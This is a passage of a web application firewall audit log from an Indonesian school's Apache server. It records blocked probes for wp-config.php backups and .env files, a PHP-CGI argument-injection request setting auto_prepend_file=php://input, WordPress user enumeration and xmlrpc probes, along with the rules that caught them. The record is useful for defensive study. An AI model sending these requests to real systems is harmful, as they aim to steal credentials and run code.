smkn22-jkt.sch.id X-Real-IP: 89.46.106.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.106.218 X-Forwarded-Proto: http Connection: close Accept: */* --1dd12c18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dd12c18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746076775936923 871 (- - -) Stopwatch2: 1746076775936923 871; combined=361, p1=297, p2=0, p3=0, p4=0, p5=63, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dd12c18-Z-- --e0bf2f19-A-- [01/May/2025:12:37:08 +0700] aBMIhI144kZ4LAGlEgwhOQAAAMo 103.236.140.4 35850 103.236.140.4 8181 --e0bf2f19-B-- GET /wp-config.php.org HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 205.196.217.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.196.217.53 X-Forwarded-Proto: http Connection: close Accept: */* --e0bf2f19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0bf2f19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746077828650288 832 (- - -) Stopwatch2: 1746077828650288 832; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0bf2f19-Z-- --302f3c00-A-- [01/May/2025:13:28:12 +0700] aBMUfCgtr0Qsi1mFAsM05AAAAI4 103.236.140.4 48518 103.236.140.4 8181 --302f3c00-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; Moto Z2 Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --302f3c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --302f3c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746080892846198 782 (- - -) Stopwatch2: 1746080892846198 782; combined=349, p1=308, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --302f3c00-Z-- --5c3bf871-A-- [01/May/2025:13:51:48 +0700] aBMaBI144kZ4LAGlEgwljQAAAMQ 103.236.140.4 53902 103.236.140.4 8181 --5c3bf871-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --5c3bf871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c3bf871-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746082308338301 792 (- - -) Stopwatch2: 1746082308338301 792; combined=309, p1=268, p2=0, p3=0, p4=0, p5=40, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c3bf871-Z-- --1c02e40f-A-- [01/May/2025:14:42:12 +0700] aBMl1Cgtr0Qsi1mFAsNMbgAAAI8 103.236.140.4 38282 103.236.140.4 8181 --1c02e40f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.74.57.225 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.74.57.225 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --1c02e40f-C-- --1c02e40f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c02e40f-E-- --1c02e40f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746085332931302 4232 (- - -) Stopwatch2: 1746085332931302 4232; combined=2635, p1=450, p2=2154, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c02e40f-Z-- --5d814b79-A-- [01/May/2025:15:50:36 +0700] aBM13I144kZ4LAGlEgxq6gAAAMw 103.236.140.4 53962 103.236.140.4 8181 --5d814b79-B-- GET /wp-config.phped HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 5.255.118.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.255.118.183 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --5d814b79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d814b79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089436562979 924 (- - -) Stopwatch2: 1746089436562979 924; combined=400, p1=362, p2=0, p3=0, p4=0, p5=37, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d814b79-Z-- --25121833-A-- [01/May/2025:15:50:37 +0700] aBM13Y144kZ4LAGlEgxq7QAAAMM 103.236.140.4 54008 103.236.140.4 8181 --25121833-B-- GET /wp-config.php.org HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.0 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --25121833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25121833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089437562953 830 (- - -) Stopwatch2: 1746089437562953 830; combined=318, p1=278, p2=0, p3=0, p4=0, p5=40, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25121833-Z-- --c84d693d-A-- [01/May/2025:15:50:38 +0700] aBM13uVeTgVPHjrSAYCQQAAAAAg 103.236.140.4 54066 103.236.140.4 8181 --c84d693d-B-- GET /wp-config.php_old2017 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.70.100.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.70.100.68 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --c84d693d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c84d693d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089438739490 895 (- - -) Stopwatch2: 1746089438739490 895; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c84d693d-Z-- --0c8ba81b-A-- [01/May/2025:15:50:39 +0700] aBM134144kZ4LAGlEgxq8gAAAME 103.236.140.4 54096 103.236.140.4 8181 --0c8ba81b-B-- GET /wp-config.php_old2018 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.7 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --0c8ba81b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c8ba81b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089439307006 902 (- - -) Stopwatch2: 1746089439307006 902; combined=355, p1=319, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c8ba81b-Z-- --913b0e46-A-- [01/May/2025:15:50:40 +0700] aBM14Cgtr0Qsi1mFAsN0vwAAAIw 103.236.140.4 54134 103.236.140.4 8181 --913b0e46-B-- GET /wp-config.php_old2019 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.84 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --913b0e46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --913b0e46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089440060054 1140 (- - -) Stopwatch2: 1746089440060054 1140; combined=349, p1=309, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --913b0e46-Z-- --cd2d7369-A-- [01/May/2025:15:50:40 +0700] aBM14Cgtr0Qsi1mFAsN0wgAAAIY 103.236.140.4 54164 103.236.140.4 8181 --cd2d7369-B-- GET /wp-config.php_old2020 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 46.182.21.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.182.21.248 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --cd2d7369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd2d7369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089440795181 849 (- - -) Stopwatch2: 1746089440795181 849; combined=386, p1=355, p2=0, p3=0, p4=0, p5=31, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd2d7369-Z-- --d8249778-A-- [01/May/2025:15:50:52 +0700] aBM17Cgtr0Qsi1mFAsN06wAAAIs 103.236.140.4 54684 103.236.140.4 8181 --d8249778-B-- GET /wp-config.php-bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.104.153.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.104.153.22 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --d8249778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8249778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089452524719 607 (- - -) Stopwatch2: 1746089452524719 607; combined=207, p1=181, p2=0, p3=0, p4=0, p5=25, sr=49, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8249778-Z-- --6c7e1b05-A-- [01/May/2025:15:50:53 +0700] aBM17cVMAgMJpNzaVtId7gAAAEk 103.236.140.4 54754 103.236.140.4 8181 --6c7e1b05-B-- GET /wp-config.php_bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.189.100.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.189.100.199 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: */* --6c7e1b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c7e1b05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746089453964500 699 (- - -) Stopwatch2: 1746089453964500 699; combined=248, p1=209, p2=0, p3=0, p4=0, p5=38, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c7e1b05-Z-- --a3c7b011-A-- [01/May/2025:16:00:51 +0700] aBM4Q-VeTgVPHjrSAYCSewAAABc 103.236.140.4 35844 103.236.140.4 8181 --a3c7b011-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3c7b011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c7b011-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746090051182252 3089 (- - -) Stopwatch2: 1746090051182252 3089; combined=1318, p1=430, p2=852, p3=0, p4=0, p5=35, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c7b011-Z-- --47123574-A-- [01/May/2025:16:00:53 +0700] aBM4RcVMAgMJpNzaVtIgPAAAAFg 103.236.140.4 35860 103.236.140.4 8181 --47123574-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47123574-C-- demo.sayHello --47123574-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47123574-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746090053969166 5343 (- - -) Stopwatch2: 1746090053969166 5343; combined=4226, p1=526, p2=3440, p3=29, p4=34, p5=112, sr=77, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47123574-Z-- --a5efa726-A-- [01/May/2025:16:14:35 +0700] aBM7eygtr0Qsi1mFAsN3fAAAAIM 103.236.140.4 39000 103.236.140.4 8181 --a5efa726-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5efa726-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5efa726-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746090875695812 2770 (- - -) Stopwatch2: 1746090875695812 2770; combined=1279, p1=426, p2=825, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5efa726-Z-- --36e97826-A-- [01/May/2025:16:14:39 +0700] aBM7figtr0Qsi1mFAsN3fwAAAJU 103.236.140.4 39016 103.236.140.4 8181 --36e97826-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36e97826-C-- demo.sayHello --36e97826-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e97826-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746090878998762 6991 (- - -) Stopwatch2: 1746090878998762 6991; combined=4979, p1=648, p2=4026, p3=38, p4=53, p5=122, sr=75, sw=92, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e97826-Z-- --a8e9ed02-A-- [01/May/2025:16:17:53 +0700] aBM8QY144kZ4LAGlEgxutgAAANY 103.236.140.4 39762 103.236.140.4 8181 --a8e9ed02-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8e9ed02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8e9ed02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746091073247732 2113 (- - -) Stopwatch2: 1746091073247732 2113; combined=987, p1=332, p2=633, p3=0, p4=0, p5=22, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8e9ed02-Z-- --e0efce74-A-- [01/May/2025:16:17:56 +0700] aBM8RI144kZ4LAGlEgxutwAAAM0 103.236.140.4 39778 103.236.140.4 8181 --e0efce74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0efce74-C-- demo.sayHello --e0efce74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0efce74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] 